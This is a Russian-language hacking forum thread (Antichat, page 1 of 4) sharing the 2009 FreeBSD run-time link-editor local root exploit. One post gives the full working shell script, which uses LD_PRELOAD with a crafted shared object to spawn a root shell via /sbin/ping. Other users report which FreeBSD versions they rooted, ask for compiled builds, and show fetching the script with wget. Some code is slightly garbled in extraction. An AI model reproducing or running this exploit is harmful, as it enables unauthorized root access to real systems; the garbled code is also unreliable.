Форум АНТИЧАТ
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   FreeBSD 7.1, 8 root expl. (https://forum.antichat.xyz/showthread.php?t=160377)

BlackSun 01.12.2009 13:07
FreeBSD 7.1, 8 root expl.
 
###############################
# EDB-ID: 10255
# CVE-ID: ()
# Title: FreeBSD Run-Time Link-Editor Local r00t Zeroday
# Author: Kingcope
# Published: 2009-11-30
###############################

Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"

Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

http://www.exploit-db.com/exploits/10255

Root-access 01.12.2009 15:32
Потестил на 6.4-RELEASE-p7 #7 - не пашет. Буду тестить дальше.

DimOnOID 01.12.2009 16:18
7.0 поестил результат рут)
Тс респект)
7.2 тоже.

svesve 05.12.2009 23:25
7.1 рутит

Seregakz 16.12.2009 02:12
закинте плз в откомпелированом виде)

kodzero 17.12.2009 04:10
7.1 Срутил.Спасибо.

xena-mil1 19.12.2009 05:51
сам експлоит
PHP код:
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat env.<< _EOF
#include <stdio.h>

main() {
        extern char **environ;
        environ = (char**)malloc(8096);

        environ[0] = (char*)malloc(1024);
        environ[1] = (char*)malloc(1024);
        strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

        execl("/sbin/ping""ping"0);
}
_EOF
gcc env.-o env
cat program.<< _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        extern char **environ;
        environ=NULL;
        system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.-c program.-fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.-nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env 


7.1 - взяло рут
6.4 - не взяло

navigat0r 19.12.2009 05:58
добряк, ТС, добряк
спасибо, порутал

M@rtein 12.01.2010 18:35
FreeBSD 7.1-RELEASE-p5
рут - успешно

mailbrush 20.01.2010 22:46
У меня он не запускается, пишет, что файл не найден...
Мои действия:
Код:
$ cd /tmp
$ wget http://myhost.ru/w00t.sh
$ chmod 777 w00t.sh
$ ./w00t.sh
: No such file or directory


Время: 12:59
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице